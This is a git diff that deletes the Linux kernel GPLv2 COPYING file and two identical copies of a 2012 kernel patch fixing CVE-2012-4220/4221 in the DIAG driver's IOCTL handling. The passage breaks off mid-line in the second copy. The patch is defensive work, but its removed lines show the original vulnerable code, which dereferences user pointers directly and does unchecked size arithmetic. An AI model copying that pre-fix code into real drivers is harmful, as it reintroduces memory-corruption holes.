diff --git a/Patches/Linux_CVEs/COPYING b/Patches/Linux_CVEs/COPYING
deleted file mode 100644
index ca442d31..00000000
--- a/Patches/Linux_CVEs/COPYING
+++ /dev/null
@@ -1,356 +0,0 @@ - - NOTE! This copyright does *not* cover user programs that use kernel - services by normal system calls - this is merely considered normal use - of the kernel, and does *not* fall under the heading of "derived work". - Also note that the GPL below is copyrighted by the Free Software - Foundation, but the instance of code that it refers to (the Linux - kernel) is copyrighted by me and others who actually wrote it. - - Also note that the only valid version of the GPL as far as the kernel - is concerned is _this_ particular version of the license (ie v2, not - v2.2 or v3.x or whatever), unless explicitly otherwise stated. - - Linus Torvalds - ----------------------------------------- - - GNU GENERAL PUBLIC LICENSE - Version 2, June 1991 - - Copyright (C) 1989, 1991 Free Software Foundation, Inc. - 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA - Everyone is permitted to copy and distribute verbatim copies - of this license document, but changing it is not allowed. - - Preamble - - The licenses for most software are designed to take away your -freedom to share and change it. By contrast, the GNU General Public -License is intended to guarantee your freedom to share and change free -software--to make sure the software is free for all its users. This -General Public License applies to most of the Free Software -Foundation's software and to any other program whose authors commit to -using it. (Some other Free Software Foundation software is covered by -the GNU Library General Public License instead.) You can apply it to -your programs, too. - - When we speak of free software, we are referring to freedom, not -price. 
Our General Public Licenses are designed to make sure that you -have the freedom to distribute copies of free software (and charge for -this service if you wish), that you receive source code or can get it -if you want it, that you can change the software or use pieces of it -in new free programs; and that you know you can do these things. - - To protect your rights, we need to make restrictions that forbid -anyone to deny you these rights or to ask you to surrender the rights. -These restrictions translate to certain responsibilities for you if you -distribute copies of the software, or if you modify it. - - For example, if you distribute copies of such a program, whether -gratis or for a fee, you must give the recipients all the rights that -you have. You must make sure that they, too, receive or can get the -source code. And you must show them these terms so they know their -rights. - - We protect your rights with two steps: (1) copyright the software, and -(2) offer you this license which gives you legal permission to copy, -distribute and/or modify the software. - - Also, for each author's protection and ours, we want to make certain -that everyone understands that there is no warranty for this free -software. If the software is modified by someone else and passed on, we -want its recipients to know that what they have is not the original, so -that any problems introduced by others will not reflect on the original -authors' reputations. - - Finally, any free program is threatened constantly by software -patents. We wish to avoid the danger that redistributors of a free -program will individually obtain patent licenses, in effect making the -program proprietary. To prevent this, we have made it clear that any -patent must be licensed for everyone's free use or not licensed at all. - - The precise terms and conditions for copying, distribution and -modification follow. 
- - GNU GENERAL PUBLIC LICENSE - TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION - - 0. This License applies to any program or other work which contains -a notice placed by the copyright holder saying it may be distributed -under the terms of this General Public License. The "Program", below, -refers to any such program or work, and a "work based on the Program" -means either the Program or any derivative work under copyright law: -that is to say, a work containing the Program or a portion of it, -either verbatim or with modifications and/or translated into another -language. (Hereinafter, translation is included without limitation in -the term "modification".) Each licensee is addressed as "you". - -Activities other than copying, distribution and modification are not -covered by this License; they are outside its scope. The act of -running the Program is not restricted, and the output from the Program -is covered only if its contents constitute a work based on the -Program (independent of having been made by running the Program). -Whether that is true depends on what the Program does. - - 1. You may copy and distribute verbatim copies of the Program's -source code as you receive it, in any medium, provided that you -conspicuously and appropriately publish on each copy an appropriate -copyright notice and disclaimer of warranty; keep intact all the -notices that refer to this License and to the absence of any warranty; -and give any other recipients of the Program a copy of this License -along with the Program. - -You may charge a fee for the physical act of transferring a copy, and -you may at your option offer warranty protection in exchange for a fee. - - 2. 
You may modify your copy or copies of the Program or any portion -of it, thus forming a work based on the Program, and copy and -distribute such modifications or work under the terms of Section 1 -above, provided that you also meet all of these conditions: - - a) You must cause the modified files to carry prominent notices - stating that you changed the files and the date of any change. - - b) You must cause any work that you distribute or publish, that in - whole or in part contains or is derived from the Program or any - part thereof, to be licensed as a whole at no charge to all third - parties under the terms of this License. - - c) If the modified program normally reads commands interactively - when run, you must cause it, when started running for such - interactive use in the most ordinary way, to print or display an - announcement including an appropriate copyright notice and a - notice that there is no warranty (or else, saying that you provide - a warranty) and that users may redistribute the program under - these conditions, and telling the user how to view a copy of this - License. (Exception: if the Program itself is interactive but - does not normally print such an announcement, your work based on - the Program is not required to print an announcement.) - -These requirements apply to the modified work as a whole. If -identifiable sections of that work are not derived from the Program, -and can be reasonably considered independent and separate works in -themselves, then this License, and its terms, do not apply to those -sections when you distribute them as separate works. But when you -distribute the same sections as part of a whole which is a work based -on the Program, the distribution of the whole must be on the terms of -this License, whose permissions for other licensees extend to the -entire whole, and thus to each and every part regardless of who wrote it. 
- -Thus, it is not the intent of this section to claim rights or contest -your rights to work written entirely by you; rather, the intent is to -exercise the right to control the distribution of derivative or -collective works based on the Program. - -In addition, mere aggregation of another work not based on the Program -with the Program (or with a work based on the Program) on a volume of -a storage or distribution medium does not bring the other work under -the scope of this License. - - 3. You may copy and distribute the Program (or a work based on it, -under Section 2) in object code or executable form under the terms of -Sections 1 and 2 above provided that you also do one of the following: - - a) Accompany it with the complete corresponding machine-readable - source code, which must be distributed under the terms of Sections - 1 and 2 above on a medium customarily used for software interchange; or, - - b) Accompany it with a written offer, valid for at least three - years, to give any third party, for a charge no more than your - cost of physically performing source distribution, a complete - machine-readable copy of the corresponding source code, to be - distributed under the terms of Sections 1 and 2 above on a medium - customarily used for software interchange; or, - - c) Accompany it with the information you received as to the offer - to distribute corresponding source code. (This alternative is - allowed only for noncommercial distribution and only if you - received the program in object code or executable form with such - an offer, in accord with Subsection b above.) - -The source code for a work means the preferred form of the work for -making modifications to it. For an executable work, complete source -code means all the source code for all modules it contains, plus any -associated interface definition files, plus the scripts used to -control compilation and installation of the executable. 
However, as a -special exception, the source code distributed need not include -anything that is normally distributed (in either source or binary -form) with the major components (compiler, kernel, and so on) of the -operating system on which the executable runs, unless that component -itself accompanies the executable. - -If distribution of executable or object code is made by offering -access to copy from a designated place, then offering equivalent -access to copy the source code from the same place counts as -distribution of the source code, even though third parties are not -compelled to copy the source along with the object code. - - 4. You may not copy, modify, sublicense, or distribute the Program -except as expressly provided under this License. Any attempt -otherwise to copy, modify, sublicense or distribute the Program is -void, and will automatically terminate your rights under this License. -However, parties who have received copies, or rights, from you under -this License will not have their licenses terminated so long as such -parties remain in full compliance. - - 5. You are not required to accept this License, since you have not -signed it. However, nothing else grants you permission to modify or -distribute the Program or its derivative works. These actions are -prohibited by law if you do not accept this License. Therefore, by -modifying or distributing the Program (or any work based on the -Program), you indicate your acceptance of this License to do so, and -all its terms and conditions for copying, distributing or modifying -the Program or works based on it. - - 6. Each time you redistribute the Program (or any work based on the -Program), the recipient automatically receives a license from the -original licensor to copy, distribute or modify the Program subject to -these terms and conditions. You may not impose any further -restrictions on the recipients' exercise of the rights granted herein. 
-You are not responsible for enforcing compliance by third parties to -this License. - - 7. If, as a consequence of a court judgment or allegation of patent -infringement or for any other reason (not limited to patent issues), -conditions are imposed on you (whether by court order, agreement or -otherwise) that contradict the conditions of this License, they do not -excuse you from the conditions of this License. If you cannot -distribute so as to satisfy simultaneously your obligations under this -License and any other pertinent obligations, then as a consequence you -may not distribute the Program at all. For example, if a patent -license would not permit royalty-free redistribution of the Program by -all those who receive copies directly or indirectly through you, then -the only way you could satisfy both it and this License would be to -refrain entirely from distribution of the Program. - -If any portion of this section is held invalid or unenforceable under -any particular circumstance, the balance of the section is intended to -apply and the section as a whole is intended to apply in other -circumstances. - -It is not the purpose of this section to induce you to infringe any -patents or other property right claims or to contest validity of any -such claims; this section has the sole purpose of protecting the -integrity of the free software distribution system, which is -implemented by public license practices. Many people have made -generous contributions to the wide range of software distributed -through that system in reliance on consistent application of that -system; it is up to the author/donor to decide if he or she is willing -to distribute software through any other system and a licensee cannot -impose that choice. - -This section is intended to make thoroughly clear what is believed to -be a consequence of the rest of this License. - - 8. 
If the distribution and/or use of the Program is restricted in -certain countries either by patents or by copyrighted interfaces, the -original copyright holder who places the Program under this License -may add an explicit geographical distribution limitation excluding -those countries, so that distribution is permitted only in or among -countries not thus excluded. In such case, this License incorporates -the limitation as if written in the body of this License. - - 9. The Free Software Foundation may publish revised and/or new versions -of the General Public License from time to time. Such new versions will -be similar in spirit to the present version, but may differ in detail to -address new problems or concerns. - -Each version is given a distinguishing version number. If the Program -specifies a version number of this License which applies to it and "any -later version", you have the option of following the terms and conditions -either of that version or of any later version published by the Free -Software Foundation. If the Program does not specify a version number of -this License, you may choose any version ever published by the Free Software -Foundation. - - 10. If you wish to incorporate parts of the Program into other free -programs whose distribution conditions are different, write to the author -to ask for permission. For software which is copyrighted by the Free -Software Foundation, write to the Free Software Foundation; we sometimes -make exceptions for this. Our decision will be guided by the two goals -of preserving the free status of all derivatives of our free software and -of promoting the sharing and reuse of software generally. - - NO WARRANTY - - 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY -FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. 
EXCEPT WHEN -OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES -PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED -OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF -MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS -TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE -PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, -REPAIR OR CORRECTION. - - 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING -WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR -REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, -INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING -OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED -TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY -YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER -PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE -POSSIBILITY OF SUCH DAMAGES. - - END OF TERMS AND CONDITIONS - - How to Apply These Terms to Your New Programs - - If you develop a new program, and you want it to be of the greatest -possible use to the public, the best way to achieve this is to make it -free software which everyone can redistribute and change under these terms. - - To do so, attach the following notices to the program. It is safest -to attach them to the start of each source file to most effectively -convey the exclusion of warranty; and each file should have at least -the "copyright" line and a pointer to where the full notice is found. - - - Copyright (C) - - This program is free software; you can redistribute it and/or modify - it under the terms of the GNU General Public License as published by - the Free Software Foundation; either version 2 of the License, or - (at your option) any later version. 
- - This program is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. - - You should have received a copy of the GNU General Public License - along with this program; if not, write to the Free Software - Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA - - -Also add information on how to contact you by electronic and paper mail. - -If the program is interactive, make it output a short notice like this -when it starts in an interactive mode: - - Gnomovision version 69, Copyright (C) year name of author - Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. - This is free software, and you are welcome to redistribute it - under certain conditions; type `show c' for details. - -The hypothetical commands `show w' and `show c' should show the appropriate -parts of the General Public License. Of course, the commands you use may -be called something other than `show w' and `show c'; they could even be -mouse-clicks or menu items--whatever suits your program. - -You should also get your employer (if you work as a programmer) or your -school, if any, to sign a "copyright disclaimer" for the program, if -necessary. Here is a sample; alter the names: - - Yoyodyne, Inc., hereby disclaims all copyright interest in the program - `Gnomovision' (which makes passes at compilers) written by James Hacker. - - , 1 April 1989 - Ty Coon, President of Vice - -This General Public License does not permit incorporating your program into -proprietary programs. If your program is a subroutine library, you may -consider it more useful to permit linking proprietary applications with the -library. If this is what you want to do, use the GNU Library General -Public License instead of this License. 
diff --git a/Patches/Linux_CVEs/CVE-2012-4220/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2012-4220/ANY/0001.patch
deleted file mode 100644
index 1965644b..00000000
--- a/Patches/Linux_CVEs/CVE-2012-4220/ANY/0001.patch
+++ /dev/null
@@ -1,345 +0,0 @@ -From 77ad483f7b82d944aae5b944cd28e923a5293668 Mon Sep 17 00:00:00 2001 -From: Ravi Aravamudhan -Date: Thu, 15 Nov 2012 16:04:04 -0800 -Subject: diag: Improve handling of IOCTLs - -DIAG kernel driver interacts with user space processes using -IOCTLS. This change adds conditions to avoid potential integer -over/underflow, incorrect buffer copy. - -CVE-2012-4220 -CVE-2012-4221 - -Change-Id: Ic1e815051ae9544c911c9a5bd0c9218c1225f6d5 -CRs-Fixed: 385352 -CRs-Fixed: 385349 -Signed-off-by: Shalabh Jain ---- - drivers/char/diag/diagchar.h | 1 + - drivers/char/diag/diagchar_core.c | 188 ++++++++++++++++++++++++++++---------- - 2 files changed, 142 insertions(+), 47 deletions(-) - -diff --git a/drivers/char/diag/diagchar.h b/drivers/char/diag/diagchar.h -index 28d0565..de3cf522 100644 ---- a/drivers/char/diag/diagchar.h -+++ b/drivers/char/diag/diagchar.h -@@ -29,6 +29,7 @@ - #define IN_BUF_SIZE 16384 - #define MAX_IN_BUF_SIZE 32768 - #define MAX_SYNC_OBJ_NAME_SIZE 32 -+#define UINT32_MAX UINT_MAX - /* Size of the buffer used for deframing a packet - reveived from the PC tool*/ - #define HDLC_MAX 4096 -diff --git a/drivers/char/diag/diagchar_core.c b/drivers/char/diag/diagchar_core.c -index 19c6ed2..7b17ce4 100644 ---- a/drivers/char/diag/diagchar_core.c -+++ b/drivers/char/diag/diagchar_core.c -@@ -358,7 +358,7 @@ void diag_clear_reg(int proc_num) - } - - void diag_add_reg(int j, struct bindpkt_params *params, -- int *success, int *count_entries) -+ int *success, unsigned int *count_entries) - { - *success = 1; - driver->table[j].cmd_code = params->cmd_code; -@@ -399,79 +399,153 @@ inline uint16_t diag_get_remote_device_mask(void) { return 0; } - long diagchar_ioctl(struct file *filp, - unsigned int iocmd, unsigned long ioarg) - { -- int i, j, count_entries = 0, temp; -- int success = -1; -+ int i, j, temp, success = -1, status; -+ unsigned int count_entries = 0, interim_count = 0; - void *temp_buf; - uint16_t support_list = 0; -- struct 
diag_dci_client_tbl *params = -- kzalloc(sizeof(struct diag_dci_client_tbl), GFP_KERNEL); -+ struct diag_dci_client_tbl *dci_params; - struct diag_dci_health_stats stats; -- int status; - - if (iocmd == DIAG_IOCTL_COMMAND_REG) { -- struct bindpkt_params_per_process *pkt_params = -- (struct bindpkt_params_per_process *) ioarg; -+ struct bindpkt_params_per_process pkt_params; -+ struct bindpkt_params *params; -+ struct bindpkt_params *head_params; -+ if (copy_from_user(&pkt_params, (void *)ioarg, -+ sizeof(struct bindpkt_params_per_process))) { -+ return -EFAULT; -+ } -+ if ((UINT32_MAX/sizeof(struct bindpkt_params)) < -+ pkt_params.count) { -+ pr_warning("diag: integer overflow while multiply\n"); -+ return -EFAULT; -+ } -+ params = kzalloc(pkt_params.count*sizeof( -+ struct bindpkt_params), GFP_KERNEL); -+ if (!params) { -+ pr_err("diag: unable to alloc memory\n"); -+ return -ENOMEM; -+ } else -+ head_params = params; -+ -+ if (copy_from_user(params, pkt_params.params, -+ pkt_params.count*sizeof(struct bindpkt_params))) { -+ kfree(head_params); -+ return -EFAULT; -+ } - mutex_lock(&driver->diagchar_mutex); - for (i = 0; i < diag_max_reg; i++) { - if (driver->table[i].process_id == 0) { -- diag_add_reg(i, pkt_params->params, -- &success, &count_entries); -- if (pkt_params->count > count_entries) { -- pkt_params->params++; -+ diag_add_reg(i, params, &success, -+ &count_entries); -+ if (pkt_params.count > count_entries) { -+ params++; - } else { - mutex_unlock(&driver->diagchar_mutex); -+ kfree(head_params); - return success; - } - } - } - if (i < diag_threshold_reg) { - /* Increase table size by amount required */ -- diag_max_reg += pkt_params->count - -+ if (pkt_params.count >= count_entries) { -+ interim_count = pkt_params.count - - count_entries; -+ } else { -+ pr_warning("diag: error in params count\n"); -+ kfree(head_params); -+ mutex_unlock(&driver->diagchar_mutex); -+ return -EFAULT; -+ } -+ if (UINT32_MAX - diag_max_reg >= -+ interim_count) { -+ diag_max_reg 
+= interim_count; -+ } else { -+ pr_warning("diag: Integer overflow\n"); -+ kfree(head_params); -+ mutex_unlock(&driver->diagchar_mutex); -+ return -EFAULT; -+ } - /* Make sure size doesnt go beyond threshold */ - if (diag_max_reg > diag_threshold_reg) { - diag_max_reg = diag_threshold_reg; - pr_info("diag: best case memory allocation\n"); - } -+ if (UINT32_MAX/sizeof(struct diag_master_table) < -+ diag_max_reg) { -+ pr_warning("diag: integer overflow\n"); -+ kfree(head_params); -+ mutex_unlock(&driver->diagchar_mutex); -+ return -EFAULT; -+ } - temp_buf = krealloc(driver->table, - diag_max_reg*sizeof(struct - diag_master_table), GFP_KERNEL); - if (!temp_buf) { -- diag_max_reg -= pkt_params->count - -- count_entries; -- pr_alert("diag: Insufficient memory for reg."); -+ pr_alert("diag: Insufficient memory for reg.\n"); - mutex_unlock(&driver->diagchar_mutex); -+ -+ if (pkt_params.count >= count_entries) { -+ interim_count = pkt_params.count - -+ count_entries; -+ } else { -+ pr_warning("diag: params count error\n"); -+ mutex_unlock(&driver->diagchar_mutex); -+ kfree(head_params); -+ return -EFAULT; -+ } -+ if (diag_max_reg >= interim_count) { -+ diag_max_reg -= interim_count; -+ } else { -+ pr_warning("diag: Integer underflow\n"); -+ mutex_unlock(&driver->diagchar_mutex); -+ kfree(head_params); -+ return -EFAULT; -+ } -+ kfree(head_params); - return 0; - } else { - driver->table = temp_buf; - } - for (j = i; j < diag_max_reg; j++) { -- diag_add_reg(j, pkt_params->params, -- &success, &count_entries); -- if (pkt_params->count > count_entries) { -- pkt_params->params++; -+ diag_add_reg(j, params, &success, -+ &count_entries); -+ if (pkt_params.count > count_entries) { -+ params++; - } else { - mutex_unlock(&driver->diagchar_mutex); -+ kfree(head_params); - return success; - } - } -+ kfree(head_params); - mutex_unlock(&driver->diagchar_mutex); - } else { - mutex_unlock(&driver->diagchar_mutex); -+ kfree(head_params); - pr_err("Max size reached, Pkt Registration failed 
for" - " Process %d", current->tgid); - } - success = 0; - } else if (iocmd == DIAG_IOCTL_GET_DELAYED_RSP_ID) { -- struct diagpkt_delay_params *delay_params = -- (struct diagpkt_delay_params *) ioarg; -- -- if ((delay_params->rsp_ptr) && -- (delay_params->size == sizeof(delayed_rsp_id)) && -- (delay_params->num_bytes_ptr)) { -- *((uint16_t *)delay_params->rsp_ptr) = -- DIAGPKT_NEXT_DELAYED_RSP_ID(delayed_rsp_id); -- *(delay_params->num_bytes_ptr) = sizeof(delayed_rsp_id); -+ struct diagpkt_delay_params delay_params; -+ uint16_t interim_rsp_id; -+ int interim_size; -+ if (copy_from_user(&delay_params, (void *)ioarg, -+ sizeof(struct diagpkt_delay_params))) -+ return -EFAULT; -+ if ((delay_params.rsp_ptr) && -+ (delay_params.size == sizeof(delayed_rsp_id)) && -+ (delay_params.num_bytes_ptr)) { -+ interim_rsp_id = DIAGPKT_NEXT_DELAYED_RSP_ID( -+ delayed_rsp_id); -+ if (copy_to_user((void *)delay_params.rsp_ptr, -+ &interim_rsp_id, sizeof(uint16_t))) -+ return -EFAULT; -+ interim_size = sizeof(delayed_rsp_id); -+ if (copy_to_user((void *)delay_params.num_bytes_ptr, -+ &interim_size, sizeof(int))) -+ return -EFAULT; - success = 0; - } - } else if (iocmd == DIAG_IOCTL_DCI_REG) { -@@ -479,7 +553,13 @@ long diagchar_ioctl(struct file *filp, - return DIAG_DCI_NO_REG; - if (driver->num_dci_client >= MAX_DCI_CLIENTS) - return DIAG_DCI_NO_REG; -- if (copy_from_user(params, (void *)ioarg, -+ dci_params = kzalloc(sizeof(struct diag_dci_client_tbl), -+ GFP_KERNEL); -+ if (dci_params == NULL) { -+ pr_err("diag: unable to alloc memory\n"); -+ return -ENOMEM; -+ } -+ if (copy_from_user(dci_params, (void *)ioarg, - sizeof(struct diag_dci_client_tbl))) - return -EFAULT; - mutex_lock(&driver->dci_mutex); -@@ -492,9 +572,9 @@ long diagchar_ioctl(struct file *filp, - if (driver->dci_client_tbl[i].client == NULL) { - driver->dci_client_tbl[i].client = current; - driver->dci_client_tbl[i].list = -- params->list; -+ dci_params->list; - driver->dci_client_tbl[i].signal_type = -- 
params->signal_type; -+ dci_params->signal_type; - create_dci_log_mask_tbl(driver-> - dci_client_tbl[i].dci_log_mask); - create_dci_event_mask_tbl(driver-> -@@ -512,6 +592,7 @@ long diagchar_ioctl(struct file *filp, - } - } - mutex_unlock(&driver->dci_mutex); -+ kfree(dci_params); - return driver->dci_client_id; - } else if (iocmd == DIAG_IOCTL_DCI_DEINIT) { - success = -1; -@@ -536,25 +617,29 @@ long diagchar_ioctl(struct file *filp, - } else if (iocmd == DIAG_IOCTL_DCI_SUPPORT) { - if (driver->ch_dci) - support_list = support_list | DIAG_CON_MPSS; -- *(uint16_t *)ioarg = support_list; -+ if (copy_to_user((void *)ioarg, &support_list, -+ sizeof(uint16_t))) -+ return -EFAULT; - return DIAG_DCI_NO_ERROR; - } else if (iocmd == DIAG_IOCTL_DCI_HEALTH_STATS) { - if (copy_from_user(&stats, (void *)ioarg, - sizeof(struct diag_dci_health_stats))) - return -EFAULT; - for (i = 0; i < MAX_DCI_CLIENTS; i++) { -- params = &(driver->dci_client_tbl[i]); -- if (params->client && -- params->client->tgid == current->tgid) { -- stats.dropped_logs = params->dropped_logs; -- stats.dropped_events = params->dropped_events; -- stats.received_logs = params->received_logs; -- stats.received_events = params->received_events; -+ dci_params = &(driver->dci_client_tbl[i]); -+ if (dci_params->client && -+ dci_params->client->tgid == current->tgid) { -+ stats.dropped_logs = dci_params->dropped_logs; -+ stats.dropped_events = -+ dci_params->dropped_events; -+ stats.received_logs = dci_params->received_logs; -+ stats.received_events = -+ dci_params->received_events; - if (stats.reset_status) { -- params->dropped_logs = 0; -- params->dropped_events = 0; -- params->received_logs = 0; -- params->received_events = 0; -+ dci_params->dropped_logs = 0; -+ dci_params->dropped_events = 0; -+ dci_params->received_logs = 0; -+ dci_params->received_events = 0; - } - break; - } -@@ -567,7 +652,7 @@ long diagchar_ioctl(struct file *filp, - for (i = 0; i < driver->num_clients; i++) - if (driver->client_map[i].pid 
== current->tgid) - break; -- if (i == -1) -+ if (i == driver->num_clients) - return -EINVAL; - driver->data_ready[i] |= DEINIT_TYPE; - wake_up_interruptible(&driver->wait_q); -@@ -1068,7 +1153,7 @@ static int diagchar_write(struct file *file, const char __user *buf, - struct diag_send_desc_type send = { NULL, NULL, DIAG_STATE_START, 0 }; - struct diag_hdlc_dest_type enc = { NULL, NULL, 0 }; - void *buf_copy = NULL; -- int payload_size; -+ unsigned int payload_size; - #ifdef CONFIG_DIAG_OVER_USB - if (((driver->logging_mode == USB_MODE) && (!driver->usb_connected)) || - (driver->logging_mode == NO_LOGGING_MODE)) { -@@ -1079,8 +1164,17 @@ static int diagchar_write(struct file *file, const char __user *buf, - /* Get the packet type F3/log/event/Pkt response */ - err = copy_from_user((&pkt_type), buf, 4); - /* First 4 bytes indicate the type of payload - ignore these */ -+ if (count < 4) { -+ pr_err("diag: Client sending short data\n"); -+ return -EBADMSG; -+ } - payload_size = count - 4; -- -+ if (payload_size > USER_SPACE_DATA) { -+ pr_err("diag: Dropping packet, packet payload size crosses 8KB limit. Current payload size %d\n", -+ payload_size); -+ driver->dropped_count++; -+ return -EBADMSG; -+ } - if (pkt_type == DCI_DATA_TYPE) { - err = copy_from_user(driver->user_space_data, buf + 4, - payload_size); --- -cgit v1.1 -
diff --git a/Patches/Linux_CVEs/CVE-2012-4221/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2012-4221/ANY/0001.patch
deleted file mode 100644
index 1965644b..00000000
--- a/Patches/Linux_CVEs/CVE-2012-4221/ANY/0001.patch
+++ /dev/null
@@ -1,345 +0,0 @@ -From 77ad483f7b82d944aae5b944cd28e923a5293668 Mon Sep 17 00:00:00 2001 -From: Ravi Aravamudhan -Date: Thu, 15 Nov 2012 16:04:04 -0800 -Subject: diag: Improve handling of IOCTLs - -DIAG kernel driver interacts with user space processes using -IOCTLS. This change adds conditions to avoid potential integer -over/underflow, incorrect buffer copy. - -CVE-2012-4220 -CVE-2012-4221 - -Change-Id: Ic1e815051ae9544c911c9a5bd0c9218c1225f6d5 -CRs-Fixed: 385352 -CRs-Fixed: 385349 -Signed-off-by: Shalabh Jain ---- - drivers/char/diag/diagchar.h | 1 + - drivers/char/diag/diagchar_core.c | 188 ++++++++++++++++++++++++++++---------- - 2 files changed, 142 insertions(+), 47 deletions(-) - -diff --git a/drivers/char/diag/diagchar.h b/drivers/char/diag/diagchar.h -index 28d0565..de3cf522 100644 ---- a/drivers/char/diag/diagchar.h -+++ b/drivers/char/diag/diagchar.h -@@ -29,6 +29,7 @@ - #define IN_BUF_SIZE 16384 - #define MAX_IN_BUF_SIZE 32768 - #define MAX_SYNC_OBJ_NAME_SIZE 32 -+#define UINT32_MAX UINT_MAX - /* Size of the buffer used for deframing a packet - reveived from the PC tool*/ - #define HDLC_MAX 4096 -diff --git a/drivers/char/diag/diagchar_core.c b/drivers/char/diag/diagchar_core.c -index 19c6ed2..7b17ce4 100644 ---- a/drivers/char/diag/diagchar_core.c -+++ b/drivers/char/diag/diagchar_core.c -@@ -358,7 +358,7 @@ void diag_clear_reg(int proc_num) - } - - void diag_add_reg(int j, struct bindpkt_params *params, -- int *success, int *count_entries) -+ int *success, unsigned int *count_entries) - { - *success = 1; - driver->table[j].cmd_code = params->cmd_code; -@@ -399,79 +399,153 @@ inline uint16_t diag_get_remote_device_mask(void) { return 0; } - long diagchar_ioctl(struct file *filp, - unsigned int iocmd, unsigned long ioarg) - { -- int i, j, count_entries = 0, temp; -- int success = -1; -+ int i, j, temp, success = -1, status; -+ unsigned int count_entries = 0, interim_count = 0; - void *temp_buf; - uint16_t support_list = 0; -- struct 
diag_dci_client_tbl *params = -- kzalloc(sizeof(struct diag_dci_client_tbl), GFP_KERNEL); -+ struct diag_dci_client_tbl *dci_params; - struct diag_dci_health_stats stats; -- int status; - - if (iocmd == DIAG_IOCTL_COMMAND_REG) { -- struct bindpkt_params_per_process *pkt_params = -- (struct bindpkt_params_per_process *) ioarg; -+ struct bindpkt_params_per_process pkt_params; -+ struct bindpkt_params *params; -+ struct bindpkt_params *head_params; -+ if (copy_from_user(&pkt_params, (void *)ioarg, -+ sizeof(struct bindpkt_params_per_process))) { -+ return -EFAULT; -+ } -+ if ((UINT32_MAX/sizeof(struct bindpkt_params)) < -+ pkt_params.count) { -+ pr_warning("diag: integer overflow while multiply\n"); -+ return -EFAULT; -+ } -+ params = kzalloc(pkt_params.count*sizeof( -+ struct bindpkt_params), GFP_KERNEL); -+ if (!params) { -+ pr_err("diag: unable to alloc memory\n"); -+ return -ENOMEM; -+ } else -+ head_params = params; -+ -+ if (copy_from_user(params, pkt_params.params, -+ pkt_params.count*sizeof(struct bindpkt_params))) { -+ kfree(head_params); -+ return -EFAULT; -+ } - mutex_lock(&driver->diagchar_mutex); - for (i = 0; i < diag_max_reg; i++) { - if (driver->table[i].process_id == 0) { -- diag_add_reg(i, pkt_params->params, -- &success, &count_entries); -- if (pkt_params->count > count_entries) { -- pkt_params->params++; -+ diag_add_reg(i, params, &success, -+ &count_entries); -+ if (pkt_params.count > count_entries) { -+ params++; - } else { - mutex_unlock(&driver->diagchar_mutex); -+ kfree(head_params); - return success; - } - } - } - if (i < diag_threshold_reg) { - /* Increase table size by amount required */ -- diag_max_reg += pkt_params->count - -+ if (pkt_params.count >= count_entries) { -+ interim_count = pkt_params.count - - count_entries; -+ } else { -+ pr_warning("diag: error in params count\n"); -+ kfree(head_params); -+ mutex_unlock(&driver->diagchar_mutex); -+ return -EFAULT; -+ } -+ if (UINT32_MAX - diag_max_reg >= -+ interim_count) { -+ diag_max_reg 
+= interim_count; -+ } else { -+ pr_warning("diag: Integer overflow\n"); -+ kfree(head_params); -+ mutex_unlock(&driver->diagchar_mutex); -+ return -EFAULT; -+ } - /* Make sure size doesnt go beyond threshold */ - if (diag_max_reg > diag_threshold_reg) { - diag_max_reg = diag_threshold_reg; - pr_info("diag: best case memory allocation\n"); - } -+ if (UINT32_MAX/sizeof(struct diag_master_table) < -+ diag_max_reg) { -+ pr_warning("diag: integer overflow\n"); -+ kfree(head_params); -+ mutex_unlock(&driver->diagchar_mutex); -+ return -EFAULT; -+ } - temp_buf = krealloc(driver->table, - diag_max_reg*sizeof(struct - diag_master_table), GFP_KERNEL); - if (!temp_buf) { -- diag_max_reg -= pkt_params->count - -- count_entries; -- pr_alert("diag: Insufficient memory for reg."); -+ pr_alert("diag: Insufficient memory for reg.\n"); - mutex_unlock(&driver->diagchar_mutex); -+ -+ if (pkt_params.count >= count_entries) { -+ interim_count = pkt_params.count - -+ count_entries; -+ } else { -+ pr_warning("diag: params count error\n"); -+ mutex_unlock(&driver->diagchar_mutex); -+ kfree(head_params); -+ return -EFAULT; -+ } -+ if (diag_max_reg >= interim_count) { -+ diag_max_reg -= interim_count; -+ } else { -+ pr_warning("diag: Integer underflow\n"); -+ mutex_unlock(&driver->diagchar_mutex); -+ kfree(head_params); -+ return -EFAULT; -+ } -+ kfree(head_params); - return 0; - } else { - driver->table = temp_buf; - } - for (j = i; j < diag_max_reg; j++) { -- diag_add_reg(j, pkt_params->params, -- &success, &count_entries); -- if (pkt_params->count > count_entries) { -- pkt_params->params++; -+ diag_add_reg(j, params, &success, -+ &count_entries); -+ if 